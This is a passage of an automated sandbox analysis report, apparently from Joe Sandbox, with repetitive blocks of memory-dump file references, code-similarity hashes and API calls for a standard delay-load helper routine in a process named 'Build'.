                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: 6822a9021ba3a02ac6d967e2189b1c3959231fb8aad4200650e3b6f44270a43e
                                                                                                                                                                                • Instruction ID: bac79ccbed06cf6ebc3e1999b86c9091a8336824bcf346895180541a6bd2b932
                                                                                                                                                                                • Opcode Fuzzy Hash: 6822a9021ba3a02ac6d967e2189b1c3959231fb8aad4200650e3b6f44270a43e
                                                                                                                                                                                • Instruction Fuzzy Hash: B0B012863BC003AC3108B14ADD02C3F02ECC2C1B10330C7FAF80CC0040D8441C010435
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B6068E
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: 4b4ff8396a3ca7ee2031be027a8d98e2086d23484cff54d63ea5d964f771b5e4
                                                                                                                                                                                • Instruction ID: aa9460ad8fce37c1833a8457f4e1887efb0f581aeb55b5a59a99e0d5cf44231b
                                                                                                                                                                                • Opcode Fuzzy Hash: 4b4ff8396a3ca7ee2031be027a8d98e2086d23484cff54d63ea5d964f771b5e4
                                                                                                                                                                                • Instruction Fuzzy Hash: 59B012863BC003AC310CB19A9C02C3F02DCD2C1B10330C9FAF40CC0140D8441C040031
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B6068E
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: de3c0cca99bf1bd9308ac64c5b1c39e9b3b0e1dcece89f2b33c296a9c44123d4
                                                                                                                                                                                • Instruction ID: 42278ff7569fd256a55fa7f7b2ade68f02012fda7ecd19e5b8347e00fa80e146
                                                                                                                                                                                • Opcode Fuzzy Hash: de3c0cca99bf1bd9308ac64c5b1c39e9b3b0e1dcece89f2b33c296a9c44123d4
                                                                                                                                                                                • Instruction Fuzzy Hash: 1FB012E73BC003AC3108B14A9C02C3F02DCC2C2B10330C5FAF80CC0040D8441C010031
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B6068E
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: c615a4467394b2605e8210b79a07e94d5d10ef1bcec4d7cf772807adbd7f712d
                                                                                                                                                                                • Instruction ID: a602a1c3134a76f28530780cd33b1bfb510469a0265fb36cb237d6b950d3fde9
                                                                                                                                                                                • Opcode Fuzzy Hash: c615a4467394b2605e8210b79a07e94d5d10ef1bcec4d7cf772807adbd7f712d
                                                                                                                                                                                • Instruction Fuzzy Hash: F1B012863FC003AC310CB14A9D02C3F02DCC2C1B10330C5FAF80CC0140D8441C090031
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B6068E
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: 817e3071f84fd33861d589c98f7b9cedfd2396244ad3b300bbb49fb4b9ee0d98
                                                                                                                                                                                • Instruction ID: 6fa86fd22ae2f4427e360193e660b8e175a1ae59d711c6210c126811ea6dc8d9
                                                                                                                                                                                • Opcode Fuzzy Hash: 817e3071f84fd33861d589c98f7b9cedfd2396244ad3b300bbb49fb4b9ee0d98
                                                                                                                                                                                • Instruction Fuzzy Hash: 12B012873BC003AC310CB54A9C02C3F02DCC2C2B10330C5FAF80CC0140D8441C050031
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B6068E
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: 90bd4e655608b83192e6dd50945062a1bb46e4d4822404765ee42c3e73b05bd5
                                                                                                                                                                                • Instruction ID: 07fbbe332cf24f9e3273819393dcd395cbc918bf0700d117ae2d6cc4502d1eb6
                                                                                                                                                                                • Opcode Fuzzy Hash: 90bd4e655608b83192e6dd50945062a1bb46e4d4822404765ee42c3e73b05bd5
                                                                                                                                                                                • Instruction Fuzzy Hash: 8EB012863BC143AC324CB14A9C02C3F02DCC2C1B10330C6FAF40CC0140D8441C440031
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B6068E
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: 907a349282de10b390fe7788b581e6e9118c3c985b3618b887b6cd0477fb2545
                                                                                                                                                                                • Instruction ID: 970c24b0043009f611c837528ce60102324823f0b11e02420b20b007ec785de8
                                                                                                                                                                                • Opcode Fuzzy Hash: 907a349282de10b390fe7788b581e6e9118c3c985b3618b887b6cd0477fb2545
                                                                                                                                                                                • Instruction Fuzzy Hash: EDB0128A3BC103AC3108F14A9C42C3F02DCD2C1B10330C5FAF40CC0140D8441C000131
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B6068E
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: 45fba5b66bb7efb50c20f073a54fc8633256211361f16eab1849da8f9c6e1885
                                                                                                                                                                                • Instruction ID: 3633ffba690b860508bbb25e63bb8fdf765d5b73d3c4bdd45c16b75555addc39
                                                                                                                                                                                • Opcode Fuzzy Hash: 45fba5b66bb7efb50c20f073a54fc8633256211361f16eab1849da8f9c6e1885
                                                                                                                                                                                • Instruction Fuzzy Hash: 8EB012863BC003BD311871469C02C3F02DCD2C1B10330C6FAF408D004098441C000035
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B6068E
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: b7c2b3ede6f442c429b4f164642faa307c2677a3a4572da3a3fe0011b12587cc
                                                                                                                                                                                • Instruction ID: 95bcc2502a08f5c3d20488c6e862a5088ff7ec8df1a0891c6d0e6f689ac6fd5d
                                                                                                                                                                                • Opcode Fuzzy Hash: b7c2b3ede6f442c429b4f164642faa307c2677a3a4572da3a3fe0011b12587cc
                                                                                                                                                                                • Instruction Fuzzy Hash: DFB0129A3BD103AD3288B24A9C02C3F02DCC2C1B10330C6FAF40CC0040D8441C400031
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B6068E
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: 0a881d288cc563aef4df81d6c5d908bc8e8214455acbef9fa9bfa1cedee5aca2
                                                                                                                                                                                • Instruction ID: 4f3d7f749585d40785f4a86c3ecce673c0c1191fdea675089e944a540fbf8777
                                                                                                                                                                                • Opcode Fuzzy Hash: 0a881d288cc563aef4df81d6c5d908bc8e8214455acbef9fa9bfa1cedee5aca2
                                                                                                                                                                                • Instruction Fuzzy Hash: F3B012E63BC003AC3108B14B9C02C3F02DCD2C1B10330C5FAF40CC0040D8441C000031
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B6068E
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: ecdd5a0170a1a9e3bfc2922ee505d47647763d53d574fce7b96cc154a15df66b
                                                                                                                                                                                • Instruction ID: 8f73441739e7a6dfe72b7cc6aa3d027ecfcc61b26409c7b3d7c483a0c9ec516b
                                                                                                                                                                                • Opcode Fuzzy Hash: ecdd5a0170a1a9e3bfc2922ee505d47647763d53d574fce7b96cc154a15df66b
                                                                                                                                                                                • Instruction Fuzzy Hash: AFB012E63BC003AC3108B14A9D02C3F02DCC2C1B10330C5FAF80DC0040D8441D010031
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B6068E
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: d465c5c22beabeb01db1789495fb4edd74463096b2cbd12bbfecbf43abe07830
                                                                                                                                                                                • Instruction ID: 9c6e4cdc9e11def28f548bca11c764174d01c20c13ba2ddfcb90a48efecd358c
                                                                                                                                                                                • Opcode Fuzzy Hash: d465c5c22beabeb01db1789495fb4edd74463096b2cbd12bbfecbf43abe07830
                                                                                                                                                                                • Instruction Fuzzy Hash: 89B012963BC003AC3108B14A9D02C3F02DCC2C1B10330C5FAF80CC0040D8441C010031
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B608A7
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: 593e70ea8a169666980ff96c9d53dbe0e93dac09dd076f5fdbf22b4770500695
                                                                                                                                                                                • Instruction ID: 9bf82e2b8117d7a1a5baf427e2bc10884f91a46257ff0478b7f3c77703891487
                                                                                                                                                                                • Opcode Fuzzy Hash: 593e70ea8a169666980ff96c9d53dbe0e93dac09dd076f5fdbf22b4770500695
                                                                                                                                                                                • Instruction Fuzzy Hash: 72B092822BC002AC2108B14A9C02D3B12E8D181B1032086EAF408C1041D84418400035
                                                                                                                                                                                APIs
